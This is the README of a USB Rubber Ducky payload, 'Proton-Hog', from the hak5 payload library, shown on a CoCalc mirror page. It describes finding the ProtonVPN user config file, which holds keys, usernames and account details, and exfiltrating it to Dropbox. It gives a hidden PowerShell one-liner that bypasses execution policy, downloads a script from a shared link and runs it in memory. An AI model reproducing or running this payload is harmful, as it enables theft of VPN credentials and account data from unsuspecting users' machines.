Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/exfiltration/Proton-Hog/README.md
2968 views

Proton-Hog

A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information.

Description

This payload will enumerate through the ProtonVPN directories, looking for the file that stores the userconfig file

Then dropbox will be used to exfiltrate the files to cloud storage

Getting Started

Dependencies

  • DropBox or other file sharing service - Your Shared link for the intended file

  • Windows 10,11

Executing program

  • Plug in your device

  • Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl

Contributing

All contributors names will be listed here

atomiczsec

I am Jakoby

Version History

  • 0.1

    • Initial Release

Contact

📱 My Socials 📱

C#
YouTube
Python
Twitter
Jsonnet
I-Am-Jakoby's Discord

Acknowledgments